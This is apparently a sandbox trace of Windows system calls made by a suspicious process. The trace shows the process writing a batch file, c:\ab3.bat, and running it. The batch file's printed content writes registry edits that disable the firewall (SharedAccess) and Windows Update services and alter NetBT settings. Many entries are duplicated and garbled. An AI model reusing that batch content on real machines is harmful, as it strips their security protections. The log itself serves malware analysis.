0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", ) , ) == 0x0
 00777   748   NtClose  (84, ... ) == 0x0
 00778   748   NtQueryInformationProcess  (-1, DeviceMap, 36, ... {process info, class 23, size 36}, 0x0, ) == 0x0
 00779   748   NtOpenFile  (0x100001, {24, 0, 0x40, 0, 0,  (0x100001, {24, 0, 0x40, 0, 0, "\??\C:\"}, 3, 16417, ... 84, {status=0x0, info=1}, ) }, 3, 16417, ... 84, {status=0x0, info=1}, ) == 0x0
 00780   748   NtQueryInformationFile  (84, 1244036, 528, Name, ... {status=0x0, info=6}, ) == 0x0
 00781   748   NtQueryVolumeInformationFile  (84, 1365848, 284, Volume, ... {status=0x0, info=18}, ) == 0x0
 00782   748   NtQueryVolumeInformationFile  (84, 1366144, 276, Attribute, ... {status=0x0, info=20}, ) == 0x0
 00783   748   NtClose  (84, ... ) == 0x0
 00784   748   NtOpenFile  (0x100001, {24, 0, 0x40, 0, 0,  (0x100001, {24, 0, 0x40, 0, 0, "\??\C:\"}, 3, 8388641, ... 84, {status=0x0, info=1}, ) }, 3, 8388641, ... 84, {status=0x0, info=1}, ) == 0x0
 00785   748   NtQueryVolumeInformationFile  (84, 1244780, 24, Size, ... {status=0x0, info=24}, ) == 0x0
 00786   748   NtClose  (84, ... ) == 0x0
 00787   748   NtQueryInformationProcess  (-1, DeviceMap, 36, ... {process info, class 23, size 36}, 0x0, ) == 0x0
 00788   748   NtOpenFile  (0x100001, {24, 0, 0x40, 0, 0,  (0x100001, {24, 0, 0x40, 0, 0, "\??\C:\"}, 3, 16417, ... 84, {status=0x0, info=1}, ) }, 3, 16417, ... 84, {status=0x0, info=1}, ) == 0x0
 00789   748   NtQueryInformationFile  (84, 1244040, 528, Name, ... {status=0x0, info=6}, ) == 0x0
 00790   748   NtQueryVolumeInformationFile  (84, 1365848, 284, Volume, ... {status=0x0, info=18}, ) == 0x0
 00791   748   NtQueryVolumeInformationFile  (84, 1366144, 276, Attribute, ... {status=0x0, info=20}, ) == 0x0
 00792   748   NtClose  (84, ... ) == 0x0
 00793   748   NtOpenFile  (0x100001, {24, 0, 0x40, 0, 0,  (0x100001, {24, 0, 0x40, 0, 0, "\??\C:\"}, 3, 8388641, ... 84, {status=0x0, info=1}, ) }, 3, 8388641, ... 84, {status=0x0, info=1}, ) == 0x0
 00794   748   NtQueryVolumeInformationFile  (84, 1244784, 24, Size, ... {status=0x0, info=24}, ) == 0x0
 00795   748   NtClose  (84, ... ) == 0x0
 00796   748   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 00797   748   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 84, ) == 0x0
 00798   748   NtQueryInformationToken  (84, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 00799   748   NtClose  (84, ... ) == 0x0
 00800   748   NtOpenKey  (0x2000000, {24, 0, 0x40, 0, 0,  (0x2000000, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1292428093-1383384898-725345543-1003_Classes"}, ... 84, ) }, ... 84, ) == 0x0
 00801   748   NtSetInformationObject  (86, Handle, {Inherit=0,ProtectFromClose=1,}, 1179904, ... ) == 0x0
 00802   748   NtQueryKey  (86, Name, 382, ... {Name= (86, Name, 382, ... {Name="\REGISTRY\USER\S-1-5-21-1292428093-1383384898-725345543-1003_CLASSES"}, 140, ) }, 140, ) == 0x0
 00803   748   NtOpenKey  (0x2000000, {24, 86, 0x40, 0, 0,  (0x2000000, {24, 86, 0x40, 0, 0, ".key"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 00804   748   NtOpenKey  (0x2000000, {24, 0, 0x40, 0, 0,  (0x2000000, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Classes"}, ... 88, ) }, ... 88, ) == 0x0
 00805   748   NtCreateKey  (0x2, {24, 88, 0x40, 0, 0,  (0x2, {24, 88, 0x40, 0, 0, ".key"}, 0, 0x0, 0, ... 92, 2, ) }, 0, 0x0, 0, ... 92, 2, ) == 0x0
 00806   748   NtClose  (88, ... ) == 0x0
 00807   748   NtQueryKey  (94, Name, 392, ... {Name= (94, Name, 392, ... {Name="\REGISTRY\MACHINE\SOFTWARE\Classes\.keyo"}, 82, ) }, 82, ) == 0x0
 00808   748   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 00809   748   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 88, ) == 0x0
 00810   748   NtQueryInformationToken  (88, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 00811   748   NtClose  (88, ... ) == 0x0
 00812   748   NtOpenKey  (0x2000000, {24, 0, 0x40, 0, 0,  (0x2000000, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1292428093-1383384898-725345543-1003_Classes\.key"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 00813   748   NtSetValueKey  (94, 0x0, 0, 1,  (94, 0x0, 0, 1, "\0\0", 2, ... , 2, ...
 00814   748   NtSetInformationFile  (-2147482448, -139610320, 8, EndOfFile, ... {status=0x0, info=0}, ) == 0x0
 00813   748   NtSetValueKey  ... ) == 0x0
 00815   748   NtClose  (94, ... ) == 0x0
 00816   748   NtQueryKey  (86, Name, 384, ... {Name= (86, Name, 384, ... {Name="\REGISTRY\USER\S-1-5-21-1292428093-1383384898-725345543-1003_CLASSES"}, 140, ) }, 140, ) == 0x0
 00817   748   NtOpenKey  (0x2, {24, 86, 0x40, 0, 0,  (0x2, {24, 86, 0x40, 0, 0, ".key"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 00818   748   NtOpenKey  (0x2, {24, 0, 0x40, 0, 0,  (0x2, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Classes\.key"}, ... 92, ) }, ... 92, ) == 0x0
 00819   748   NtQueryKey  (94, Name, 392, ... {Name= (94, Name, 392, ... {Name="\REGISTRY\MACHINE\SOFTWARE\Classes\.keyo"}, 82, ) }, 82, ) == 0x0
 00820   748   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 00821   748   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 88, ) == 0x0
 00822   748   NtQueryInformationToken  (88, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 00823   748   NtClose  (88, ... ) == 0x0
 00824   748   NtOpenKey  (0x2000000, {24, 0, 0x40, 0, 0,  (0x2000000, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1292428093-1383384898-725345543-1003_Classes\.key"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 00825   748   NtSetValueKey  (94, " (94, "", 0, 1, "r\0e\0g\0f\0i\0l\0e\0\0\0", 16, ... ) r\0e\0g\0f\0i\0l\0e\0\0\0", 16, ... ) == 0x0
 00826   748   NtClose  (94, ... ) == 0x0
 00827   748   NtAllocateVirtualMemory  (-1, 9961472, 0, 16384, 4096, 4, ... 9961472, 16384, ) == 0x0
 00828   748   NtFreeVirtualMemory  (-1, (0x980000), 16384, 16384, ... (0x980000), 16384, ) == 0x0
 00829   748   NtQuerySystemInformation  (Basic, 44, ... {Unknown=0,MaximumIncrement=156250,PhysicalPageSize=0x1000,NumberOfPhysicalPages=0xff7c,LowestPhysicalPage=0x1,HighestPhysicalPage=0xffff,AllocationGranularity=0x10000,LowestUserAddress=0x10000,HighestUserAddress=0x7ffeffff,ActiveProcessors=1,NumberProcessors=1,}, 0x0, ) == 0x0
 00830   748   NtAllocateVirtualMemory  (-1, 0, 0, 65536, 8192, 4, ... 11337728, 65536, ) == 0x0
 00831   748   NtAllocateVirtualMemory  (-1, 11337728, 0, 4096, 4096, 4, ... 11337728, 4096, ) == 0x0
 00832   748   NtAllocateVirtualMemory  (-1, 11341824, 0, 20480, 4096, 4, ... 11341824, 20480, ) == 0x0
 00833   748   NtAllocateVirtualMemory  (-1, 0, 0, 1048576, 8192, 4, ... 11403264, 1048576, ) == 0x0
 00834   748   NtAllocateVirtualMemory  (-1, 11403264, 0, 32768, 4096, 4, ... 11403264, 32768, ) == 0x0
 00835   748   NtAllocateVirtualMemory  (-1, 0, 0, 22, 4096, 64, ... 12451840, 4096, ) == 0x0
 00836   748   NtAllocateVirtualMemory  (-1, 0, 0, 512, 4096, 64, ... 12517376, 4096, ) == 0x0
 00837   748   NtAllocateVirtualMemory  (-1, 0, 0, 29, 4096, 64, ... 12582912, 4096, ) == 0x0
 00838   748   NtAllocateVirtualMemory  (-1, 0, 0, 512, 4096, 64, ... 12648448, 4096, ) == 0x0
 00839   748   NtAllocateVirtualMemory  (-1, 0, 0, 34, 4096, 64, ... 12713984, 4096, ) == 0x0
 00840   748   NtAllocateVirtualMemory  (-1, 0, 0, 512, 4096, 64, ... 12779520, 4096, ) == 0x0
 00841   748   NtAllocateVirtualMemory  (-1, 0, 0, 17, 4096, 64, ... 12845056, 4096, ) == 0x0
 00842   748   NtAllocateVirtualMemory  (-1, 0, 0, 512, 4096, 64, ... 12910592, 4096, ) == 0x0
 00843   748   NtAllocateVirtualMemory  (-1, 0, 0, 13, 4096, 64, ... 12976128, 4096, ) == 0x0
 00844   748   NtAllocateVirtualMemory  (-1, 0, 0, 512, 4096, 64, ... 13041664, 4096, ) == 0x0
 00845   748   NtAllocateVirtualMemory  (-1, 0, 0, 13, 4096, 64, ... 13107200, 4096, ) == 0x0
 00846   748   NtAllocateVirtualMemory  (-1, 0, 0, 512, 4096, 64, ... 13172736, 4096, ) == 0x0
 00847   748   NtAllocateVirtualMemory  (-1, 0, 0, 25, 4096, 64, ... 13238272, 4096, ) == 0x0
 00848   748   NtAllocateVirtualMemory  (-1, 0, 0, 512, 4096, 64, ... 13303808, 4096, ) == 0x0
 00849   748   NtAllocateVirtualMemory  (-1, 0, 0, 25, 4096, 64, ... 13369344, 4096, ) == 0x0
 00850   748   NtAllocateVirtualMemory  (-1, 0, 0, 512, 4096, 64, ... 13434880, 4096, ) == 0x0
 00851   748   NtAllocateVirtualMemory  (-1, 0, 0, 55, 4096, 64, ... 13500416, 4096, ) == 0x0
 00852   748   NtAllocateVirtualMemory  (-1, 0, 0, 512, 4096, 64, ... 13565952, 4096, ) == 0x0
 00853   748   NtAllocateVirtualMemory  (-1, 0, 0, 19, 4096, 64, ... 13631488, 4096, ) == 0x0
 00854   748   NtAllocateVirtualMemory  (-1, 0, 0, 512, 4096, 64, ... 13697024, 4096, ) == 0x0
 00855   748   NtQueryVirtualMemory  (-1, 0x41dee2, Basic, 28, ... {BaseAddress=0x41d000,AllocationBase=0x400000,AllocationProtect=0x80,RegionSize=0x1c000,State=0x1000,Protect=0x40,Type=0x1000000,}, 28, ) == 0x0
 00856   748   NtQueryInformationProcess  (-1, 36, 4, ... {process info, class 36, size 4}, 0x0, ) == 0x0
 00857   748   NtQueryInformationProcess  (-1, 36, 4, ... {process info, class 36, size 4}, 0x0, ) == 0x0
 00858   748   NtQueryVirtualMemory  (-1, 0x77c2807c, Basic, 28, ... {BaseAddress=0x77c28000,AllocationBase=0x77c10000,AllocationProtect=0x80,RegionSize=0x35000,State=0x1000,Protect=0x20,Type=0x1000000,}, 28, ) == 0x0
 00859   748   NtAllocateVirtualMemory  (-1, 0, 0, 22, 4096, 64, ... 13762560, 4096, ) == 0x0
 00860   748   NtAllocateVirtualMemory  (-1, 0, 0, 512, 4096, 64, ... 13828096, 4096, ) == 0x0
 00861   748   NtAllocateVirtualMemory  (-1, 0, 0, 19, 4096, 64, ... 13893632, 4096, ) == 0x0
 00862   748   NtAllocateVirtualMemory  (-1, 0, 0, 512, 4096, 64, ... 13959168, 4096, ) == 0x0
 00863   748   NtCreateFile  (0x40100080, {24, 0, 0x40, 0, 1236096,  (0x40100080, {24, 0, 0x40, 0, 1236096, "\??\c:\ab3.bat"}, 0x0, 0, 0, 5, 96, 0, 0, ... }, 0x0, 0, 0, 5, 96, 0, 0, ...
 00864   748   NtClose  (-2147482740, ... ) == 0x0
 00863   748   NtCreateFile  ... 92, {status=0x0, info=2}, ) == 0x0
 00865   748   NtAllocateVirtualMemory  (-1, 0, 0, 22, 4096, 64, ... 14024704, 4096, ) == 0x0
 00866   748   NtAllocateVirtualMemory  (-1, 0, 0, 512, 4096, 64, ... 14090240, 4096, ) == 0x0
 00867   748   NtWriteFile  (92, 0, 0, 0,  (92, 0, 0, 0, "@echo off\15\12Echo REGEDIT4>%temp%\1.reg\15\12Echo.>>%temp%\1.reg\15\12Echo  [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Parameters]>>%temp%\1.reg\15\12Echo "TransportBindName"="">>%temp%\1.reg\15\12Echo.>>%temp%\1.reg\15\12Echo  [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess]>>%temp%\1.reg\15\12Echo "Start"=dword:00000004>>%temp%\1.reg\15\12Echo.>>%temp%\1.reg\15\12Echo  [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wuauserv]>>%temp%\1.reg\15\12Echo "Start"=dword:00000004>>%temp%\1.reg\15\12Ec", 5894, 0x0, 0, ... TransportBindName (92, 0, 0, 0, "@echo off\15\12Echo REGEDIT4>%temp%\1.reg\15\12Echo.>>%temp%\1.reg\15\12Echo  [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Parameters]>>%temp%\1.reg\15\12Echo "TransportBindName"="">>%temp%\1.reg\15\12Echo.>>%temp%\1.reg\15\12Echo  [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess]>>%temp%\1.reg\15\12Echo "Start"=dword:00000004>>%temp%\1.reg\15\12Echo.>>%temp%\1.reg\15\12Echo  [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wuauserv]>>%temp%\1.reg\15\12Echo "Start"=dword:00000004>>%temp%\1.reg\15\12Ec", 5894, 0x0, 0, ...  (92, 0, 0, 0, "@echo off\15\12Echo REGEDIT4>%temp%\1.reg\15\12Echo.>>%temp%\1.reg\15\12Echo  [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Parameters]>>%temp%\1.reg\15\12Echo "TransportBindName"="">>%temp%\1.reg\15\12Echo.>>%temp%\1.reg\15\12Echo  [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess]>>%temp%\1.reg\15\12Echo "Start"=dword:00000004>>%temp%\1.reg\15\12Echo.>>%temp%\1.reg\15\12Echo  [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wuauserv]>>%temp%\1.reg\15\12Echo "Start"=dword:00000004>>%temp%\1.reg\15\12Ec", 5894, 0x0, 0, ... Start (92, 0, 0, 0, "@echo off\15\12Echo REGEDIT4>%temp%\1.reg\15\12Echo.>>%temp%\1.reg\15\12Echo  [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Parameters]>>%temp%\1.reg\15\12Echo "TransportBindName"="">>%temp%\1.reg\15\12Echo.>>%temp%\1.reg\15\12Echo  [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess]>>%temp%\1.reg\15\12Echo "Start"=dword:00000004>>%temp%\1.reg\15\12Echo.>>%temp%\1.reg\15\12Echo  [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wuauserv]>>%temp%\1.reg\15\12Echo "Start"=dword:00000004>>%temp%\1.reg\15\12Ec", 5894, 0x0, 0, ... Start (92, 0, 0, 0, "@echo off\15\12Echo REGEDIT4>%temp%\1.reg\15\12Echo.>>%temp%\1.reg\15\12Echo  [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Parameters]>>%temp%\1.reg\15\12Echo "TransportBindName"="">>%temp%\1.reg\15\12Echo.>>%temp%\1.reg\15\12Echo  [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess]>>%temp%\1.reg\15\12Echo "Start"=dword:00000004>>%temp%\1.reg\15\12Echo.>>%temp%\1.reg\15\12Echo  [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wuauserv]>>%temp%\1.reg\15\12Echo "Start"=dword:00000004>>%temp%\1.reg\15\12Ec", 5894, 0x0, 0, ... , 5894, 0x0, 0, ...
 00868   748   NtContinue  (-139612716, 0, ...
 00867   748   NtWriteFile  ... {status=0x0, info=5894}, ) == 0x0
 00869   748   NtClose  (92, ... ) == 0x0
 00870   748   NtAllocateVirtualMemory  (-1, 0, 0, 54, 4096, 64, ... 14155776, 4096, ) == 0x0
 00871   748   NtAllocateVirtualMemory  (-1, 0, 0, 512, 4096, 64, ... 14221312, 4096, ) == 0x0
 00872   748   NtQueryInformationJobObject  (0, BasicUIRestrictions, 4, ... ) == STATUS_ACCESS_DENIED
 00873   748   NtAllocateVirtualMemory  (-1, 1224704, 0, 4096, 4096, 260, ... 1224704, 4096, ) == 0x0
 00874   748   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\c:\ab3.bat"}, 1232452, ... ) }, 1232452, ... ) == 0x0
 00875   748   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\c:\ab3.bat"}, 1233188, ... ) }, 1233188, ... ) == 0x0
 00876   748   NtOpenFile  (0x1000a1, {24, 0, 0x40, 0, 0,  (0x1000a1, {24, 0, 0x40, 0, 0, "\??\c:\ab3.bat"}, 5, 96, ... 92, {status=0x0, info=1}, ) }, 5, 96, ... 92, {status=0x0, info=1}, ) == 0x0
 00877   748   NtCreateSection  (0xf001f, 0x0, 0x0, 16, 16777216, 92, ... ) == STATUS_INVALID_IMAGE_NOT_MZ
 00878   748   NtOpenKey  (0x1, {24, 0, 0x40, 0, 0,  (0x1, {24, 0, 0x40, 0, 0, "\Registry\MACHINE\System\CurrentControlSet\Control\Session Manager\AppCompatibility"}, ... 88, ) }, ... 88, ) == 0x0
 00879   748   NtQueryValueKey  (88,  (88, "DisableAppCompat", Partial, 20, ... ) , Partial, 20, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 00880   748   NtClose  (88, ... ) == 0x0
 00881   748   NtQueryVolumeInformationFile  (92, 1232464, 8, Device, ... {status=0x0, info=8}, ) == 0x0
 00882   748   NtOpenMutant  (0x120001, {24, 48, 0x0, 0, 0,  (0x120001, {24, 48, 0x0, 0, 0, "ShimCacheMutex"}, ... 88, ) }, ... 88, ) == 0x0
 00883   748   NtAllocateVirtualMemory  (-1, 1368064, 0, 4096, 4096, 4, ... 1368064, 4096, ) == 0x0
 00884   748   NtWaitForSingleObject  (88, 0, {-1000000, -1}, ... ) == 0x0
 00885   748   NtOpenSection  (0x2, {24, 48, 0x0, 0, 0,  (0x2, {24, 48, 0x0, 0, 0, "ShimSharedMemory"}, ... 96, ) }, ... 96, ) == 0x0
 00886   748   NtMapViewOfSection  (96, -1, (0x0), 0, 0, {0, 0}, 0, 1, 0, 4, ... (0xda0000), {0, 0}, 57344, ) == 0x0
 00887   748   NtReleaseMutant  (88, ... 0x0, ) == 0x0
 00888   748   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\Apphelp.dll"}, 1230396, ... ) }, 1230396, ... ) == 0x0
 00889   748   NtOpenFile  (0x100020, {24, 0, 0x40, 0, 0,  (0x100020, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\Apphelp.dll"}, 5, 96, ... 100, {status=0x0, info=1}, ) }, 5, 96, ... 100, {status=0x0, info=1}, ) == 0x0
 00890   748   NtCreateSection  (0xe, 0x0, 0x0, 16, 134217728, 100, ... 104, ) == 0x0
 00891   748   NtClose  (100, ... ) == 0x0
 00892   748   NtMapViewOfSection  (104, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 16, ... (0xdb0000), 0x0, 126976, ) == 0x0
 00893   748   NtClose  (104, ... ) == 0x0
 00894   748   NtUnmapViewOfSection  (-1, 0xdb0000, ... ) == 0x0
 00895   748   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\Apphelp.dll"}, 1230704, ... ) }, 1230704, ... ) == 0x0
 00896   748   NtOpenFile  (0x100020, {24, 0, 0x40, 0, 0,  (0x100020, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\Apphelp.dll"}, 5, 96, ... 104, {status=0x0, info=1}, ) }, 5, 96, ... 104, {status=0x0, info=1}, ) == 0x0
 00897   748   NtCreateSection  (0xf, 0x0, 0x0, 16, 16777216, 104, ... 100, ) == 0x0
 00898   748   NtQuerySection  (100, Image, 48, ... {section info, class 1, size 48}, 0x0, ) == 0x0
 00899   748   NtClose  (104, ... ) == 0x0
 00900   748   NtMapViewOfSection  (100, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 4, ... (0x77b40000), 0x0, 139264, ) == 0x0
 00901   748   NtClose  (100, ... ) == 0x0
 00902   748   NtProtectVirtualMemory  (-1, (0x77b41000), 524, 4, ... (0x77b41000), 4096, 32, ) == 0x0
 00903   748   NtProtectVirtualMemory  (-1, (0x77b41000), 4096, 32, ... (0x77b41000), 4096, 4, ) == 0x0
 00904   748   NtFlushInstructionCache  (-1, 2008289280, 524, ... ) == 0x0
 00905   748   NtOpenKey  (0x80000000, {24, 0, 0x40, 0, 0,  (0x80000000, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Apphelp.dll"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 00906   748   NtCreateFile  (0x80100080, {24, 0, 0x40, 0, 0,  (0x80100080, {24, 0, 0x40, 0, 0, "\SystemRoot\AppPatch\sysmain.sdb"}, 0x0, 128, 1, 1, 96, 0, 0, ... 100, {status=0x0, info=1}, ) }, 0x0, 128, 1, 1, 96, 0, 0, ... 100, {status=0x0, info=1}, ) == 0x0
 00907   748   NtQueryInformationFile  (100, 1230720, 24, Standard, ... {status=0x0, info=24}, ) == 0x0
 00908   748   NtCreateSection  (0x4, 0x0, 0x0, 2, 134217728, 100, ... 104, ) == 0x0
 00909   748   NtMapViewOfSection  (104, -1, (0x0), 0, 0, 0x0, 0, 2, 0, 2, ... (0xdb0000), 0x0, 1191936, ) == 0x0
 00910   748   NtQueryInformationFile  (100, 1230820, 24, Standard, ... {status=0x0, info=24}, ) == 0x0
 00911   748   NtCreateFile  (0x80100080, {24, 0, 0x40, 0, 0,  (0x80100080, {24, 0, 0x40, 0, 0, "\SystemRoot\AppPatch\systest.sdb"}, 0x0, 128, 1, 1, 96, 0, 0, ... ) }, 0x0, 128, 1, 1, 96, 0, 0, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 00912   748   NtAllocateVirtualMemory  (-1, 1220608, 0, 4096, 4096, 260, ... 1220608, 4096, ) == 0x0
 00913   748   NtQuerySystemInformation  (Processor, 12, ... {system info, class 1, size 12}, 0x0, ) == 0x0
 00914   748   NtQueryInformationProcess  (-1, Wow64, 4, ... {process info, class 26, size 4}, 0x0, ) == 0x0
 00915   748   NtOpenKey  (0x101, {24, 0, 0x40, 0, 0,  (0x101, {24, 0, 0x40, 0, 0, "\Registry\Machine\System\WPA\TabletPC"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 00916   748   NtOpenKey  (0x101, {24, 0, 0x40, 0, 0,  (0x101, {24, 0, 0x40, 0, 0, "\Registry\Machine\SYSTEM\WPA\MediaCenter"}, ... 108, ) }, ... 108, ) == 0x0
 00917   748   NtQueryValueKey  (108,  (108, "Installed", Partial, 256, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) , Partial, 256, ... TitleIdx=0, Type=4, Data= (108, "Installed", Partial, 256, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) }, 16, ) == 0x0
 00918   748   NtClose  (108, ... ) == 0x0
 00919   748   NtCreateFile  (0x120116, {24, 0, 0x40, 0, 0,  (0x120116, {24, 0, 0x40, 0, 0, "\Device\NamedPipe\ShimViewer"}, 0x0, 128, 0, 1, 0, 0, 0, ... ) }, 0x0, 128, 0, 1, 0, 0, 0, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 00920   748   NtOpenFile  (0x100001, {24, 0, 0x40, 0, 0,  (0x100001, {24, 0, 0x40, 0, 0, "\??\c:\"}, 3, 16417, ... 108, {status=0x0, info=1}, ) }, 3, 16417, ... 108, {status=0x0, info=1}, ) == 0x0
 00921   748   NtQueryDirectoryFile  (108, 0, 0, 0, 1228416, 616, BothDirectory, 1,  (108, 0, 0, 0, 1228416, 616, BothDirectory, 1, "ab3.bat", 0, ... {status=0x0, info=108}, ) , 0, ... {status=0x0, info=108}, ) == 0x0
 00922   748   NtClose  (108, ... ) == 0x0
 00923   748   NtQueryInformationProcess  (-1, DefaultHardErrorMode, 4, ... {process info, class 12, size 4}, 0x0, ) == 0x0
 00924   748   NtSetInformationProcess  (-1, DefaultHardErrorMode, {process info, class 12, size 4}, 4, ... ) == 0x0
 00925   748   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\c:\ab3.bat"}, 1228792, ... ) }, 1228792, ... ) == 0x0
 00926   748   NtOpenFile  (0x100001, {24, 0, 0x40, 0, 0,  (0x100001, {24, 0, 0x40, 0, 0, "\??\c:\"}, 3, 16417, ... 108, {status=0x0, info=1}, ) }, 3, 16417, ... 108, {status=0x0, info=1}, ) == 0x0
 00927   748   NtQueryDirectoryFile  (108, 0, 0, 0, 1228220, 616, BothDirectory, 1,  (108, 0, 0, 0, 1228220, 616, BothDirectory, 1, "ab3.bat", 0, ... {status=0x0, info=108}, ) , 0, ... {status=0x0, info=108}, ) == 0x0
 00928   748   NtClose  (108, ... ) == 0x0
 00929   748   NtQueryInformationProcess  (-1, DefaultHardErrorMode, 4, ... {process info, class 12, size 4}, 0x0, ) == 0x0
 00930   748   NtSetInformationProcess  (-1, DefaultHardErrorMode, {process info, class 12, size 4}, 4, ... ) == 0x0
 00931   748   NtQueryInformationProcess  (-1, DeviceMap, 36, ... {process info, class 23, size 36}, 0x0, ) == 0x0
 00932   748   NtOpenKey  (0x80000100, {24, 0, 0x40, 0, 0,  (0x80000100, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 00933   748   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 00934   748   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 108, ) == 0x0
 00935   748   NtQueryInformationToken  (108, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 00936   748   NtClose  (108, ... ) == 0x0
 00937   748   NtOpenKey  (0x80000100, {24, 0, 0x40, 0, 0,  (0x80000100, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1292428093-1383384898-725345543-1003\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 00938   748   NtOpenKey  (0x80000100, {24, 0, 0x40, 0, 0,  (0x80000100, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom\ab3.bat"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 00939   748   NtQueryInformationProcess  (-1, DefaultHardErrorMode, 4, ... {process info, class 12, size 4}, 0x0, ) == 0x0
 00940   748   NtSetInformationProcess  (-1, DefaultHardErrorMode, {process info, class 12, size 4}, 4, ... ) == 0x0
 00941   748   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\c:\ab3.bat"}, 1230044, ... ) }, 1230044, ... ) == 0x0
 00942   748   NtOpenFile  (0x100001, {24, 0, 0x40, 0, 0,  (0x100001, {24, 0, 0x40, 0, 0, "\??\c:\"}, 3, 16417, ... 108, {status=0x0, info=1}, ) }, 3, 16417, ... 108, {status=0x0, info=1}, ) == 0x0
 00943   748   NtQueryDirectoryFile  (108, 0, 0, 0, 1229472, 616, BothDirectory, 1,  (108, 0, 0, 0, 1229472, 616, BothDirectory, 1, "ab3.bat", 0, ... {status=0x0, info=108}, ) , 0, ... {status=0x0, info=108}, ) == 0x0
 00944   748   NtClose  (108, ... ) == 0x0
 00945   748   NtQueryInformationProcess  (-1, DefaultHardErrorMode, 4, ... {process info, class 12, size 4}, 0x0, ) == 0x0
 00946   748   NtSetInformationProcess  (-1, DefaultHardErrorMode, {process info, class 12, size 4}, 4, ... ) == 0x0
 00947   748   NtWaitForSingleObject  (88, 0, {-1000000, -1}, ... ) == 0x0
 00948   748   NtQueryVolumeInformationFile  (92, 1230700, 8, Device, ... {status=0x0, info=8}, ) == 0x0
 00949   748   NtQueryInformationFile  (92, 1230680, 40, Basic, ... {status=0x0, info=40}, ) == 0x0
 00950   748   NtQueryInformationFile  (92, 1230720, 24, Standard, ... {status=0x0, info=24}, ) == 0x0
 00951   748   NtReleaseMutant  (88, ... 0x0, ) == 0x0
 00952   748   NtUnmapViewOfSection  (-1, 0xdb0000, ... ) == 0x0
 00953   748   NtClose  (104, ... ) == 0x0
 00954   748   NtClose  (100, ... ) == 0x0
 00955   748   NtOpenThreadToken  (-2, 0x2000000, 1, ... ) == STATUS_NO_TOKEN
